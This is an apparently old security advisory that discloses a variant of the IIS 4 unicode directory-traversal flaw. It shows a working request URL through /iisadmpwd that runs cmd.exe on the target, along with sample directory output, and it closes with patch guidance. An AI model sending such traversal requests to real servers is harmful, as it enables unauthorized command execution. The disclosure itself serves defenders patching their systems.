===[ www.sinsecurity.net ]===

====[ Information ]======
Program Name   : Microsoft Internet Information Server (IIS)
Program Author : http://www.microsoft.com/iis
Test Versions  : 4, others not vulnerable
Advisory Author: Niels Teusink, a.k.a. Nu Omega Tau
Contact        : [EMAIL PROTECTED]
=========================

This advisory was made in Holland.

Overview
========
Extended unicode is an exploit found in october 2000 by an unknown person, rfp did 
further research on this. Later on,
variants were found, such as using the /msadc directory instead of /scripts and user 
different ways of unicode encoding.
All these techniques had their pro's and con's, the /scripts method worked on both 
IIS4 and 5, but didn't work if the
wwwroot directory was on a different partition then the winnt directory. The /msadc 
method solved this as the /msadc
directory is in \program files which is usually on the same partition as the winnt 
dir, the msadc method though doesn't
work with IIS5.
Both of the methods still had a common flaw, the name of the winnt directory must be 
known for the exploit to work,
with my new method, this isn't the case. My method only works with IIS4 though.

For more information on the vulnerability, do a search in the bugtraq archives on 
www.securityfocus.com with the keyword
"Unicode".
RainForestPuppy's research can be found at www.wiretrip.net.

Problem Description
===================
When using the /iisadmpwd which is a subdirectory of the windows nt directory, it is 
not necessary to specify the windows
nt directory. We can just do http://target.machine/iisadmpwd/..%c0%af../cmd.exe?/c+dir
as you can see, I don't specify any directory, but get back:

 Directory of C:\WINDOWS\System32\inetsrv\iisadmpwd

01/01/00  11:11a        <DIR>          .
01/01/00  11:11a        <DIR>          ..
01/01/00  11:11p                 1,902 achg.htr
(...)

I can imagine admins scanning their network with home-made scripts for vulnerabilities 
and only fixing machines where the
vulnerabilities are found. When the installation directory is not winnt, the 
vulnerability wouldn't be detected but still
can be exploited if the machine isn't patched.

Solution
========
This is not a new problem and DOES NOT require a new patch, if you haven't applied the 
unicode patch yet because the
technique didn't work on your system, it may be a good idea to do so now. The patch 
can be found at
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23667
Altough this is not a new problem I decided to inform Microsoft of this method before 
posting this.

===[ Niels Teusink - Sin Security ]===

Don't deface, email!


Find the best deals on the web at AltaVista Shopping!
http://www.shopping.altavista.com

Reply via email to